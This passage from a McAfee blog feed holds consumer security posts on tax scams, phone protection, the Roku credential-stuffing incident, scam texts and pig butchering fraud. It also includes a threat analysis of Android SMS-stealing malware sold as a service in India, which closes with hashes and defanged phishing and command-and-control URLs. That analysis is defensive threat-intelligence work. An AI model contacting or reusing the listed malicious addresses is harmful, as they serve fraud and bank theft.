And here’s one item that certainly bears mentioning: dispose of your old technology securely. What’s on that old hard drive of yours? That old computer may contain loads of precious personal and financial info on it. Look into the e-waste disposal options in your community. There are services that will dispose of and recycle old technology while doing it in a secure manner so the data and info on your device doesn’t see the light of day again.

Spot a tax scam? Report it.

As said earlier, don’t let a bad deed go unreported. The IRS offers the following avenues of communication to report scams.

• Contact the Treasury Inspector General for Tax Administration to report a phone scam. Use their “IRS Impersonation Scam Reporting” web page. You can also call 800-366-4484.
• Report phone scams to the Federal Trade Commission. Use the “FTC Complaint Assistant” on FTC.gov. Please add “IRS Telephone Scam” in the notes.
• Report an unsolicited email claiming to be from the IRS, or an IRS-related component like the Electronic Federal Tax Payment System, to the IRS at phishing@irs.gov.

Stay safe this tax season!

In all, learning to recognize the scams that crooks aim at elders and putting some strong security measures in place can help prevent these crimes from happening to you or a loved one. Take a moment to act. It’s vital, because your personal information has a hefty price tag associated with it—both at tax time and any time.

The post How to Spot, and Prevent, the Tax Scams That Target Elders appeared first on McAfee Blog.

Android Phishing Scam Using Malware-as-a-Service on the Rise in India

Authored by ZePeng Chen and Wenfeng Yu 

McAfee Mobile Research Team has observed an active scam malware campaign targeting Android users in India. This malware has gone through three stages. The first one is the development stage, from March 2023 to July 2023, during which a couple of applications were created each month. The second is the expansion stage, from August 2023 to October 2023, during which dozens of applications were created each month. The third is the active stage, from September 2023 to the present, during which hundreds of applications were created each month. According to McAfee’s detection telemetry data, this malware has accumulated over 800 applications and has infected more than 3,700 Android devices. The campaign is still ongoing, and the number of infected devices will continue to rise. 

Malware developers create phishing pages for scenarios that are easy to deceive, such as electricity bill payments, hospital appointments, and courier package bookings. Developers use different applications to load different phishing pages, which are eventually sold to scammers. In our research, more than 100 unique phishing URLs and more than 100 unique C2 URLs are created in these malicious applications. It means that each scammer can carry out scam activities independently. 

Scammers use malware to attack victims. They typically contact victims via phone, text, email, or social applications to inform them that they need to reschedule services. This kind of fraud attack is a typical and effective fraud method. As a result, victims are asked to download a specific app, and submit personal information. There was a report where an Indian woman downloaded malware from a link in WhatsApp and about ₹98,000 was stolen from her. We were not able to confirm if is the same malware, but it is just one example of how these malicious applications can be distributed directly via WhatsApp. 

The attack scenario appears credible, many victims do not doubt the scammers’ intentions. Following the instructions provided, they download and installed the app. In the app, victims are induced to submit sensitive information such as personal phone numbers, addresses, bank card numbers, and passwords. Once this information falls into the hands of scammers, they can easily steal funds from the victim’s bank account.  

The malware not only steals victims’ bank account information via phishing web pages but also steals SMS messages on victims’ devices. Because of the stolen information, even if the bank account supports OTP authentication, the scammer can transfer all the funds. The malware uses legitimate platforms to deploy phishing pages to make it appear more trustworthy to evade detection.  

McAfee Mobile Security detects this threat as Android/SmsSpy. For more information, and to get fully protected, visit McAfee Mobile Security. 

Malware-as-a-Service (MaaS) 

We discovered that these phishing pages and malware were being sold as a service by a cyber group named ELVIA INFOTECH. A distinct difference between this malware and others is that the apps sold have a valid expiration date. When the expiration date is reached, some application links will redirect to a payment notification page. The notification is clearly to request the purchaser to pay a fee to restore the use of the malware. 

Figure 1. Payment notification. 

We also discovered that the cybercriminal group was selling malware in a Telegram group. Based on these observations, we believe that ELVIA INFOTECH is a professional cybercriminal organization engaged in the development, maintenance, and sale of malware and phishing websites. 

 

Figure 2. Telegram Group conversation. 

Malware Analysis 

This malware has been maintained and recently updated, and hundreds of malicious applications were created. They like to use the file names such as “CustomerSupport.apk”, “Mahavitaran Bill Update.apk”, “Appointment Booking.apk”, “Hospital Support.apk”, “Emergency Courier.apk” and the application names such as “Customer Support”, “Blue Dart”, “Hospital Support”,” Emergency Courier” to trick victims, below are some applications’ names and icons.  

Figure 3. Some applications’ names and icons 

Not only do they pretend to be “Customer Support”, but they also pretend to be popular courier companies like “Blue Dart” in India, but they also target utility companies like “Mahavitaran” (Power Corporation of India). 

Once victims click the fake icon, the application will be launched and start to attack victims. 

1. Loading Phishing Pages

The phishing page loads once the application is launched. It will disguise itself as a page of various legitimate services, making victims believe that they are visiting a legitimate service website. Here, victims are tricked into providing sensitive information such as name, address, phone number, bank card number, and password. However, once submitted, this information falls into the hands of scammers, allowing them to easily access and control the victim’s bank account. 

We found that most of this attack campaign impersonated carrier package delivery companies. 

 

Figure 4. Phishing Pages Load Once App Launches 

The malware developers also designed different phishing pages for different applications to deceive victims in different scenarios that exploit electricity bill payments and hospital appointments. 

 

Figure 5. Hospital appointment and Electricity Bill Phishing Pages 

2. Stealing One-Time Passwords via SMS message 

As a core design of this malware, the application requests permissions to allow it to send and view SMS messages once it launches.   

Figure 6. Request SMS permissions. 

If victims click the “Allow” button, the malware starts a background service that secretly monitors users’ text messages and forwards them to a number which is from C2 server.  

 

 

Figure 7. Forward phone number from C2 server 

This step is crucial for the scam process, as many banks send a one-time password (OTP) to the customer’s phone for transaction verification. Using this method, the scammers can obtain these OTPs and successfully complete bank transactions. 

Conclusion: 

This malicious app and the developers behind it have emerged rapidly in India from last year to now, purposefully developing and maintaining malware, and focusing on deploying well-designed phishing websites through legitimate platforms. The group secretly promotes and sells its malware through social media platforms, making the spread of the malware more subtle and difficult to detect. This tactic resulted in an even more severe malware outbreak, posing an ongoing and serious threat to the financial security of Indian users. 

Malware campaigns are very persistent and using multiple different applications on different websites can trick many victims into installing these applications and providing their private and personal information, which can then be used to commit fraud. In this environment, ordinary users in India face huge cybersecurity challenges. Therefore, users need to remain vigilant and cautious when dealing with any electronic communications or application download requests that appear legitimate but may contain malware. We strongly recommend users install security software on their devices and always keep it up to date. By using McAfee Mobile Security products, users can further protect their devices and reduce the risks associated with this type of malware, providing a more secure experience. 

Indicators of Compromise (IOCs) 

SHA256 hash List: 

• 092efedd8e2e0c965290154b8a6e2bd5ec19206f43d50d339fa1485f8ff6ccba  
• 7b1f692868df9ff463599a486658bcdb862c1cf42e99ec717e289ddb608c8350  
• c59214828ed563ecc1fff04efdfd2bff0d15d411639873450d8a63754ce3464c  
• b0df37a91b93609b7927edf4c24bfdb19eecae72362066d555278b148c59fe85  
• 07ad0811a6dac7435f025e377b02b655c324b7725ab44e36a58bc68b27ce0758  
• c8eb4008fa4e0c10397e0fb9debf44ca8cbadc05663f9effbeac2534d9289377  
• 1df43794618ef8d8991386f66556292429926cd7f9cf9b1837a08835693feb40  
• 5b3d8f85f5637b217e6c97e6b422e6b642ce24d50de4a6f3a6b08c671f1b8207 

Phishing URLs: 

• hxxps://bijlipayupdate[.]wixsite[.]com/my-site  
• hxxps://appointmentservice0[.]wixsite[.]com/onlineappointment  
• hxxps://couriers9343[.]wixsite[.]com/courier/  
• hxxps://doctorappointment34[.]wixsite[.]com/appointmentbooking  
• hxxps://hospitalservice402[.]wixsite[.]com/hospital-in  
• hxxps://adn-reg[.]com/website 

C2 Server URLs: 

• hxxps://forexroyality[.]online/complainf13/My_File[.]txt  
• hxxps://adn-reg[.]com/data[.]json  
• hxxps://icustomrcore[.]com/chand3/data[.]json  
• hxxps://sms[.]hrms[.]org[.]in/chugxgddhmurgiwalabhaiqwertadmin/no[.]html  
• hxxps://krishna[.]salaar[.]co[.]in/admindata[.]txt  
• hxxps://courier[.]elviainfotech[.]cloud/pages/phone[.]json 

The post Android Phishing Scam Using Malware-as-a-Service on the Rise in India appeared first on McAfee Blog.

7 Tips to Protect Your Smartphone from Getting Hacked

There’s little rest for your hard-working smartphone. If you’re like many professionals today, you use it for work, play, and a mix of personal business in between. Now, what if something went wrong with that phone, like loss or theft? Worse yet, what if your smartphone got hacked? Let’s try and keep that from happening to you. 

Globally, plenty of people pull double duty with their smartphones. In Spain, one survey found that 55% of people use the same phone for a mix of personal and and work activity. The same survey showed that up to half of people interviewed in Japan, Australia, and the U.S. do so as well, while nations like the UK and Germany trailed at 31% and 23% respectively. 

Whether these figures trend on the low or high end, the security implications remain constant. A smartphone loaded with business and personal data makes for a desirable target. Hackers target smartphones because they’re often unprotected, which gives hackers an easy “in” to your personal information and to any corporate networks you may use.  It’s like two hacks with one stone.  

Put simply, as a working professional with a smartphone, you’re a high-value target.  

Protect your smartphone from being hacked 

As both a parent and a professional, I put together a few things you can do to protect your smartphone from hacks so that you can keep your personal and work life safe: 

1. Add extra protection with your face, finger, pattern, or PIN. 

First up, the basics. Locking your phone with facial ID, a fingerprint, pattern or a pin is your most basic form of protection, particularly in the event of loss or theft. (Your options will vary depending on the device, operating system, and manufacturer.) Take it a step further for even more protection. Secure the accounts on your phone with strong passwords and use two-factor authentication on the apps that offer it, which doubles your line of defense.    

2. Use a VPN. 

Or, put another way, don’t hop onto public Wi-Fi networks without protection. A VPN masks your connection from hackers allowing you to connect privately when you are on unsecure public networks at airports, cafes, hotels, and the like. With a VPN connection, you’ll know that your sensitive data, documents, and activities you do are protected from snooping, which is definitely a great feeling given the amount of personal and professional business we manage with our smartphones. 

3. Stick to the official app stores for your apps.

Both Google Play and Apple’s App Store have measures in place to help prevent potentially dangerous apps from making it into their stores. Malicious apps are often found outside of the app stores, which can run in the background and compromise your personal data like passwords, credit card numbers, and more—practically everything that you keep on your phone. Further, when you are in the app stores, look closely at the descriptions and reviews for apps before you download them. Malicious apps and counterfeits can still find their way into stores, and here are a few ways you can keep those bad apps from getting onto your phone.    

4. Back up the data on your phone. 

Backing up your phone is always a good idea for two reasons: 

• First, it makes the process of transitioning to a new phone easy by transferring that backed up data from your old phone to your new phone. 
• Second, it ensures that your data stays with you if your phone is lost or stolen—allowing you to remotely wipe the data on your lost or stolen phone while still having a secure copy of that data stored in the cloud.  

Both iPhones and Android phones have straightforward ways of backing up your phone regularly. 

5. Learn how to lock or wipe your phone remotely in case of emergency. 

Worst case scenario—your phone is gone. Really gone. Either it’s hopelessly lost or got stolen. What now? Lock it remotely or even wipe its data entirely. While that last bit about wiping the phone seems like a drastic move, if you maintain regular backups as mentioned above, your data is secure in the cloud—ready for you to restore. In all, this means that hackers won’t be able to access you, or your company’s, sensitive information—which can keep you out of trouble and your professional business safe. Apple provides iOS users with a step-by-step guide for remotely wiping devices, and Google offers up a guide for Android users as well. 

6. Get rid of old apps—and update the ones you keep. 

We all download apps, use them once, and then forget they are on our phone. Take a few moments to swipe through your screen and see which ones you’re truly done with and delete them along with their data. Some apps have an account associated with them that may store data off your phone as well. Take the extra step and delete those accounts so any off-phone data is deleted.  

The reason for this is that every extra app is another app that needs updating or that may have a security issue associated with it. In a time of data breaches and vulnerabilities, deleting old apps is a smart move. As for the ones you keep, update them regularly and turn on auto-updates if that’s an option. Updates not only introduce new features to apps, but they also often address security issues too. 

7. Protect your phone. 

With so much of your life on your phone, getting security software installed on it can protect you and the things you keep on your phone. Whether you’re an Android owner or iOS owner, mobile security software can keep your data, your shopping, and payments secure. 

The post 7 Tips to Protect Your Smartphone from Getting Hacked appeared first on McAfee Blog.

15,000+ Roku Accounts Compromised — Take These Steps to Protect Yourself

Hackers used one of the oldest tricks in the book to turn a buck. All at the expense of several thousand Roku users.

Roku notified users that “certain individual Roku accounts” might have been accessed by someone other than their owners. The method of attack involved … credential stuffing, where stolen passwords from one account are “stuffed” into other accounts. With this form of attack, a reused password in one account can give access to several others.

Roku discovered that was the likely cause here, affecting at least 15,000 users.[i]

“Through our investigation, we determined that unauthorized actors had likely obtained certain usernames and passwords of consumers from third-party sources (e.g., through data breaches of third-party services that are not related to Roku).”

So while Roku itself wasn’t breached, hackers used info from other data breaches to break into these accounts, which were sold online. Reportedly for as little as fifty cents each.

With access to the compromised accounts, thieves tried to purchase subscriptions and hardware using stored payment options.

Roku went on to say that these unauthorized actors didn’t get access to “social security numbers, full payment account numbers, dates of birth, or other similar sensitive personal information requiring notification.”

The company said it continues to monitor accounts for unusual activity and that it’s working with subscribers to refund any unauthorized charges.

It has also reset passwords for potentially affected account holders. The company directed users to visit my.roku.com and use the “Forgot password?” option on the sign-in page.

What can I do if I think I got caught up in the Roku breach?

While an estimated 15,000-plus compromised accounts have been identified, the possibility remains that yet more might be at risk as well. Every Roku subscriber should check their account for unusual activity. From there, we suggest updating your password to a new password that’s both strong and unique.

With that, we recommend that you take the following steps, which can help prevent and halt any harm being done with your personal info.

Keep an eye out for phishing attacks.

With some personal info in hand, bad actors might seek out more. They might follow up a breach with rounds of phishing attacks that direct you to bogus sites designed to steal your personal info — either by tricking you into providing it or by stealing it without your knowledge. So look out for phishing attacks, particularly after breaches.

If you are contacted by a company, make certain the communication is legitimate. Bad actors might pose as them to steal personal info. Don’t click or tap on links sent in emails, texts, or messages. Instead, go straight to the appropriate website or contact them by phone directly.

In this case, head to my.roku.com and use the “Forgot password?” option as the company suggests.

Change your passwords and use a password manager.

Changing passwords now is a must. Strong and unique passwords are best, which means never reusing your passwords across different sites and platforms. Using a password manager helps you keep on top of it all, while also storing your passwords securely. Moreover, changing your passwords regularly might make a stolen password worthless because it’s out of date.

Enable two-factor authentication.

While a strong and unique password is a good first line of defense, enabling two-factor authentication across your accounts helps your cause by providing an added layer of security. It’s increasingly common to see nowadays, where banks and all manner of online services will only allow access to your accounts after you’ve provided a one-time passcode sent to your email or smartphone. If your accounts support two-factor authentication, enable it.

Unfortunately at this time, Roku users don’t have this option available to them (although Roku does offer it for its smart home app).

Consider using identity monitoring, particularly for the dark web.

An identity monitoring service can monitor everything from email addresses to IDs and phone numbers for signs of breaches so you can take action to secure your accounts before they’re used for identity theft.​ Personal info harvested from data breaches can end up on dark web marketplaces where other bad actors buy it for their own attacks. Ours monitors the dark web for your personal info and provides early alerts if your data is found on there, an average of 10 months ahead of similar services.​ We also provide guidance to help you act if your info is found.

In the case of the Roku attack, the account thieves purchased compromised accounts on dark web marketplaces. Identity monitoring can help you spot that kind of activity, which then lets you know it’s time to change your passwords.

Check your credit, consider a security freeze, and get ID theft protection.

Although Roku said it found no evidence that account thieves gained access to further sensitive info, treat your info like it was anyway. Strongly consider taking preventive measures now. Checking your credit and getting identity theft protection can help keep you safe in the wake of a breach. Further, a security freeze can help prevent identity theft if you spot any unusual activity. You can get all three in place with our McAfee+ Advanced or Ultimate plans. Features include:

• Credit monitoring keeps an eye on changes to your credit score, report, and accounts with timely notifications and guidance so you can take action to tackle identity theft.
• Security freeze protects you proactively by stopping unauthorized access to existing credit card, bank, and utility accounts or from new ones being opened in your name. And it won’t affect your credit score.
• ID Theft & Restoration Coverage gives you $2 million in identity theft coverage and identity restoration support if determined you’re a victim of identity theft.​ This way, you can cover losses and repair your credit and identity with a licensed recovery expert.

Consider using comprehensive online protection.

A complete suite of online protection software can offer layers of extra security. In addition to more private and secure time online with a VPN, identity monitoring, and password management, it includes web browser protection that can block malicious and suspicious links that might lead you down the road to malware or a phishing scam — which antivirus protection can’t do alone. Additionally, we offer support from a licensed recovery pro who can help you restore your credit, just in case.

[i] https://apps.web.maine.gov/online/aeviewer/ME/40/e9cc298b-379b-47ba-a10d-e2263963b574.shtml

 

The post 15,000+ Roku Accounts Compromised — Take These Steps to Protect Yourself appeared first on McAfee Blog.

Scam or Not? How to Tell Whether Your Text Message Is Real 

According to reports from the Federal Trade Commission’s Consumer Sentinel database, text message scams swindled $330 million from Americans in 2022 alone. The staggering figure highlights a growing concern for consumers globally, who increasingly interact with brands and service providers via text, email, and even social media. As our reliance on technology continues, it is important for everyone to understand how to spot scam texts amid the real messages they receive.  amid the real messages they receive.

With such frequent communication from brands and organizations, you can be hard-pressed to figure out what is a scam or not. This practical and actionable advice may be able to help you spot the imposters and protect yourself against even the most hard-to-identify scam messages.

Understand how brands say they’ll contact you

Most of us probably avoid reading disclaimers and terms of service from brands and organizations. Paying attention to guidelines for how an organization will contact you will help you stay safe from scams. Just take it from entertainment host, Andy Cohen.

Cohen received an email he thought was from his bank’s fraud department. Later, the scammer texted Cohen claiming to be from the bank, asking for more information. Cohen ended up sending the scammer money because he believed they were a bank representative. These days, many banks and brands have FYIs on their website about how to spot a legitimate text. Like this page from Chase, which goes over what a real Chase text looks like.

We have a similar disclosure on our site. For example, our customer service teams will never request sensitive information such as social security numbers, PINs, or bank or payment details. As soon as you sign up for a new account, it’s a good idea to check for this sort of disclaimer and familiarize yourself with contact methods and the type of information organizations might request.

Verify the message’s source

Scam messages are so successful because scammers make them look real. During the holidays, when shoppers are ready to leap at deals, scam messages can be hard to resist. With an increased volume of scam texts during major shopping seasons, it’s no wonder open rates can be as high as 98%.

Consumers can protect themselves against realistic-looking scam messages by verifying the source of the message. If an email hits your mobile inbox, click on the sender’s name to expand their full email address. Typical brand emails will have a “do not reply” somewhere in the address or an official “@branddomain.com” email address. Scam email addresses often appear as strings of gibberish.

If unsure whether a text from a company is real, log into your account directly to see if it reflects the overdue bill or extra store credit that the text message suggests.

Educate yourself about the latest scam trends

Knowing about the latest cybersecurity trends is always good practice. Scammers change their tactics constantly. Text scams that were popular one year may be totally out of style the next time you get a scam message.

Individuals looking for a place to start can check out FTC, FBI, and CISA websites. Those agencies offer valuable insights about fraud trends, and recommendations about how people can protect themselves. The Better Business Bureau (BBB) has an interactive scam tracking tool, and AARP provides tips for older Americans who may not be as in tune with the latest tech trends and tools.

Layer protection with cutting-edge software

Thankfully, the software designed to protect against scams evolves, as well. Consumers can turn to product suites that offer features like finding and removing personal info from sites that sell it, adjusting social media controls and even providing alerts about suspicious financial transactions.

For scam texts, AI is here to help. McAfee Scam Protection uses AI to scan SMS text messages and alert you about unsafe links. Users can delete those messages without opening them, reducing the risk of compromise and removing any question about whether the message is fraudulent or real.

 

Take a proactive approach to prevent text scams

The $330 million figure is a stark reminder of growing fraud. As we continue into the digital age, the threat of fraudulent communications from scammers looms. To safeguard against bad actors, consumers must be proactive. By paying attention to brand communication guidelines, verifying the source of messages, remaining educated and using modern privacy and identity products, consumers can avoid scams before they start.

The post Scam or Not? How to Tell Whether Your Text Message Is Real  appeared first on McAfee Blog.

What are Pig Butchering Scams and How Do They Work?

“Jessica” cost him one million dollars.  

In an account to Forbes, one man described how he met “Jessica” online.ⁱ Readily, they formed a friendship. Turns out, “Jessica” was a great listener, particularly as he talked about the tough times he was going through. Through chats on WhatsApp, he shared the struggles of supporting his family and rapidly ailing father.  

The story telegraphs itself. Yes, “Jessica” was a scammer. Yet this scam put a new twist on an old con game. The man fell victim to a pig butchering scam — a scam that weaves together long strings of messages, cryptocurrency, and bogus investment opportunities. 

Many victims lose everything.  

“Jessica’s” victim broke down the scam, how it worked, and how he got roped in. It began with an introductory text in October that spun into a WhatsApp transcript spanning 271,000 words. Throughout, he shared his family and financial struggles. 

Then, “Jessica” offered hope. Investments that would turn a fast buck.  

“Jessica” walked him through several transactions on an app he was told to download. Small investments at first, yet increasingly larger. “Jessica” needed him to invest more and more, despite his reservations. Yet his balance grew and grew each time he followed her explicit directions.  

Then, the trap sprung. Twice. In November, he logged into the app and found a negative balance close to half a million dollars. “Jessica” reassured him that he could get it back, and then some. “Jessica” encouraged him to borrow. He did. From his bank and a childhood friend.  

Soon, he was back up to nearly $2 million. Or so he thought. In December, he logged into the app once again and found a negative balance of $1 million. His savings and borrowed money alike disappeared — straight into the hands of scammers. All the while, they manipulated the app with a plug-in that fabricated financial results. His whopping gains were actually massive losses. 

He’s far from the only victim of pig butchering. Last year, we brought you the story of “Leslie,” a retired woman who fell victim to a different form of the same scam. A so-called friend she met online directed her to invest her retirement funds for even more returns. Soon, a lonely yet otherwise sharp retiree found herself down $100,000.  

Victims like these find themselves among the thousands of people who fall for pig butchering scams each year. The problem is global in scope, costing billions of dollars each year. Yet as pig butchering represents a new type of scam, it uses some age-old tricks to separate people from their money.  

With that, pig butchering scams are preventable. Awareness plays a major role, along with several other steps people can take to keep it from happening to them. 

What’s a pig butchering scam? 

It’s a con game with a vivid name. Just as a livestock farm raises pork for profit, scammers foster long-term relationships with their victims for profit. The scammers start by taking small sums of money, which increase over time, until the victim finally gets “fattened up” and “butchered” for one final whopping sum. The term appears to have origins in the Chinese phrase zhu zai, meaning “to slaughter a pig.” 

What sets pig butchering scams apart from romance scams, elder scams, and other con games is cryptocurrency. Scammers lure their victims into investing in ventures, seemingly profitable ones because the scammers appear to make the same investments themselves. With great success. Victims then mirror those investments, yet the “market” is rigged. With phony sites and apps, the scammers point to big gains — which are all mocked up on the screen. Instead, the money goes straight to them. 

The scam follows a script, one that “Jessica” played out to the letter. You can see the steps. 

It starts out innocently enough. A text on the phone, a note on a messaging app, or a direct message on social media comes to the victim from out of the blue. It’s from someone they don’t know, and they might ask a simple question, like … 

“Is this John? We shared a tee time at the course last week and I have that extra club I said I’d give you.” 

“Hi, Sally. It’s me. Sorry I can’t make lunch today. Can we reschedule?” 

Or even as simple as … 

“Hey.” 

These “wrong number” texts and messages are anything but unintended. In some cases, victims get randomly picked. Blasts of texts and messages get sent to broad audiences, all in the hope that a handful of potential victims will reply. 

Yet, by and large, victims get carefully selected. And researched. The scammers work from a dossier of info gathered on the victim, full of tidbits harvested from the victim’s online info and social media profiles. Who puts together those dossiers? Often, it’s a large, organized crime operation. The scammer behind the messages is only one part of a much larger scamming machine, which we’ll cover in a bit. 

With that intel in hand, the scammers have their opening.  

After an introduction, the scammer kicks off a conversation. Over time, the conversations get personal. And those personal touches have a way of luring people in. Scammers pose as another person, such as “Jessica,” sprinkle things into the conversation like similar interests or family backgrounds. Anything that’s just enough to intrigue the victim and keep them chatting. 

From there, scammers play a long con game, building trust with their victims over time. Things tend to get increasingly personal. The scammer pumps the victim for more and more news of their life. What they’re worried about. What dreams they have. And in cases where the scam takes a romantic turn, how they’ll build a life together. 

Then, money comes into play. 

With a solid read on their victims and their lives, scammers drop hints about investment opportunities with big returns. The scammer rarely takes the money themselves. In fact, they almost always insist that the victim handles the money themselves. Instead, scammers lure their victims into using bogus apps that look like they support a legitimate trading platform. Yet they’re not. These apps act as a direct line to the scamming operation that the scammer’s working for. The money goes right into their pocket. 

Meanwhile, victims see something else entirely. Scammers give them step-by-step instructions that cover what to invest, where, and how to conduct transactions with cryptocurrency. The sums start small. First $5,000 or $10,000. The victim checks in with their new investment “app” and sees a great gain. The process repeats, as the sums get proverbially fatter and fatter. 

Finally, the truth comes out. Hard reality strikes when victims try to transfer their cryptocurrency out of their app. They can’t. There’s nothing there. The scammers manipulated the info on that bogus app. All the investments, all the transaction history, and all the earnings — fake. 

And because the scammers did their dirty work in cryptocurrency, that money is gone. Practically untraceable and practically impossible to get back.  

Clearly, “Jessica” followed this scam to the letter. However, it’s highly likely “Jessica” didn’t work alone. 

Pig butchering scams and organized crime. 

Organized crime props up the vast majority of pig butchering scams.  

The United States FBI points to several large-scale pig butchering operations, centered mostly in Southeast Asia.ⁱⁱ Other findings point to operations in Nigeria, where thousands of “Yahoo Boys” fire off romantic messages in their form of a pig butchering ring.ⁱⁱⁱ  

In another account, a Reuters Special Report traced $9 million to an account registered to a well-connected representative of a Chinese trade group in Thailand — which hinted at yet broader collusion and fraud. 

These are big-time scams, backed by big-time operations. They run like them too. 

They have dev and design teams that create legit-looking finance apps. They have even further trappings of a large, legitimate company, including support, customer service, accounting, and the like to manage transactions. Then they have their front-line operatives, the people doing the texting and messaging.  

However, many of these front-line scammers do it against their will. 

An even darker aspect of pig butchering scams reveals itself when you discover who does the actual dirty work. As reported by the FBI, these front-line scammers are often human trafficking victims: 

Criminal actors target victims, primarily in Asia, in employment fraud schemes by posting false job advertisements on social media and online employment sites. The schemes cover a wide range of opportunities, to include tech support, call center customer service, and beauty salon technicians.  

Job seekers are offered competitive salaries, lucrative benefits, paid travel expenses as well as room and board. Often throughout the process, the location for the position is shifted from the advertised location. Upon job seekers’ arrival in the foreign country, criminal actors use multiple means to coerce them to commit cryptocurrency investment schemes, such as confiscation of passports and travel documents, threat of violence, and use of violence.iv 

The cruel fact of pig butchering scams is this: victims victimize victims. 

Meanwhile, organized crime operations get rich. One piece of academic research traced $75.3 billion to one suspected pig butchering network alone between 2020 and 2024.v  

In the U.S., the FBI points to $2.57 billion in cryptocurrency and pig butchering fraud reports in 2022.vi As always with such figures, many losses go unreported. That figure climbs much higher. Yet higher still when it accounts for victims worldwide. 

How to prevent pig butchering attacks. 

Effective pig butchering requires that dossier we talked about before. A profile of the victim that includes personal details siphoned from online sources. One move that can lower your risk of becoming a target involves trimming down your presence online.  

Steps include … 

Make your social media more private. Our new McAfee Social Privacy Manager personalizes your privacy based on your preferences. It does the heavy lifting by adjusting more than 100 privacy settings across your social media accounts in only a few clicks. This makes sure that your personal info is only visible to the people you want to share it with. It also keeps it out of search engines where the public can see it. Including scammers. 

Watch what you post on public forums. As with social media, scammers harvest info from online forums dedicated to sports, hobbies, interests, and the like. If possible, use a screen name on these sites so that your profile doesn’t immediately identify you. Likewise, keep your personal details to yourself. When posted on a public forum, it becomes a matter of public record. Anyone, including scammers, can look it up. 

Remove your info from data brokers that sell it. McAfee Personal Data Cleanup helps you remove your personal info from many of the riskiest data broker sites out there. Running it regularly can keep your name and info off these sites, even as data brokers collect and post new info. Depending on your plan, it can send requests to remove your data automatically.  

Delete your old accounts. Yet another source of personal info comes from data breaches. Scammers use this info as well to complete a sharper picture of their potential victims. With that, many internet users can have over 350 online accounts, many of which they might not know are still active. McAfee Online Account Cleanup can help you delete them. It runs monthly scans to find your online accounts and shows you their risk level. From there, you can decide which to delete, protecting your personal info from data breaches and your overall privacy as a result. 

How to stop a pig butchering attack. 

Whether you think you’re a target or think you know someone who might be, you can take immediate steps to stop a pig butchering attack. It begins with awareness. Simply by reading this blog article, you’ve gained an understanding of what these attacks are and how they work. Not to mention how costly they can be.  

If you think something sketchy is going on, take the following steps: 

Ignore it. 

It’s that simple. The fact that a lot of these scams start over WhatsApp and text messages means that the scammer either got your phone number online or they targeted your number randomly. In either case, they count on your response. And continued responses. In many cases, the initial contact is made by one person and viable candidates are passed on to more seasoned scammers. Bottom line: don’t interact with people you don’t know. No need to reply with “Sorry, wrong number” or anything like that. Ignore these messages and move on. 

When a stranger you’ve just met online brings up money, consider it a scam. 

Money talk is an immediate sign of a scam. The moment a person you’ve never met and got to know face to face asks for money, put an end to the conversation. Whether they ask for money, bank transfers, cryptocurrency, money orders, or gift cards, say no. And with pig butchering scams, never follow their directions for making a specific investment with specific tools. Doing so only funnels money into the scamming operation’s coffers. 

End the conversation. 

You might say no, and the scammer might back off — only to bring up the topic again later. This is a sign to end the conversation. That persistence is a sure sign of a scam. Recognize that this might be far easier said than done, as the saying goes. Scammers horn their way into the lives of their victims. A budding friendship or romance might be at stake. That’s what the scammers want you to think. They play off emotions. Hard as it is, end the relationship. 

Talk with trusted friends or family members. And look out for them too. 

Sometimes it takes an extra set of eyes to spot a scammer. Conversations with scammers won’t always add up. By talking about the people you meet online with someone you trust can help you see when it doesn’t. Given the way that scammers pull all kinds of strings on their victims, conversation — even to the point of showing messages to a friend — can help clear up any clouded judgment.  

With anyone you meet online, take things slowly. 

Alarming as pig butchering stories sound, not every new person you meet online is out to get you. For every “Jessica” out there, you’ll find far more genuine people who really do want to strike up a friendship with you. Yet as these scams increase, our guard must go up as well. 

It’s always been good advice to take a relationship slowly online. Scammers have long taken advantage of people who rush to provide personal details and hand over their trust. As with any confidence scam, look for people who want to have a video call with you, meet in person in a public place, or otherwise give you the chance to see that they’re a genuine person. And not a “Jessica.” 

Know those signs of a scam when you see them. And if they rear their head, act on them. 

[i] https://www.forbes.com/sites/cyrusfarivar/2022/09/09/pig-butchering-crypto-super-scam/?sh=7417db61ec8e

[ii] https://www.ic3.gov/Media/Y2023/PSA230522

[iii] https://papers.ssrn.com/sol3/papers.cfm?abstract_id=4742235

[iv] https://www.ic3.gov/Media/Y2023/PSA230522

[v] https://papers.ssrn.com/sol3/papers.cfm?abstract_id=4742235

[vi] https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf

The post What are Pig Butchering Scams and How Do They Work? appeared first on McAfee Blog.

How we’re #InspiringInclusion at McAfee for International Women’s Day 2024

International Women’s Day 2024’s theme, #InspireInclusion, reminds us that genuine change requires going beyond individual actions. It’s about fostering an environment where all women feel welcomed, valued, and empowered. At McAfee, we believe this starts with inspiring inclusion across every aspect of our company culture.

While we’re proud of our strides – achieving global pay parity, expanding parental leave, and ensuring diverse hiring panels – we recognize the journey continues. This International Women’s Day, we’re not just celebrating our achievements, but inspiring others to join us in building a more inclusive future.

Here’s how we’re #InspiringInclusion at McAfee:

Actively challenge biases: We’re committed to fostering a culture of open dialogue and awareness, empowering everyone to call out and challenge unconscious biases in themselves and others.

Empower diverse voices: We actively seek out diverse perspectives and experiences, ensuring everyone feels valued and heard. We celebrate the unique contributions of every team member.

McAfee Communities (also known as Employee Resource Groups (ERGs): Creating safe spaces for open dialogue, fostering a sense of belonging, and amplifying diverse perspectives

Check out members from #TeamMcAfee striking the #InspireInclusion pose:

Join McAfee and millions of others around the world in celebrating International Women’s Day by sharing how you’ll #InspireInclusion.

Interested in finding out more about what we’re doing to drive meaningful change at McAfee? Check out our Impact Report

The post How we’re #InspiringInclusion at McAfee for International Women’s Day 2024 appeared first on McAfee Blog.

The What, Why, and How of AI and Threat Detection

There are more online users now than ever before, thanks to the availability of network-capable devices and online services. The internet population in Canada is the highest it has been, topping the charts at 33 million. That number is only expected to increase through the upcoming years. However, this growing number and continued adoption of online services pose increasing cybersecurity risks as cybercriminals take advantage of more online users and exploit vulnerabilities in online infrastructure. This is why we need AI-backed software to provide advanced protection for online users.   

The nature of these online threats is ever-changing, making it difficult for legacy threat detection systems to monitor threat behavior and detect new malicious code. Fortunately, threat detection systems such as McAfee+ adapt to incorporate the latest threat intelligence and artificial intelligence (AI) driven behavioral analysis. Here’s how AI impacts cybersecurity to go beyond traditional methods to protect online users. 

What is AI? 

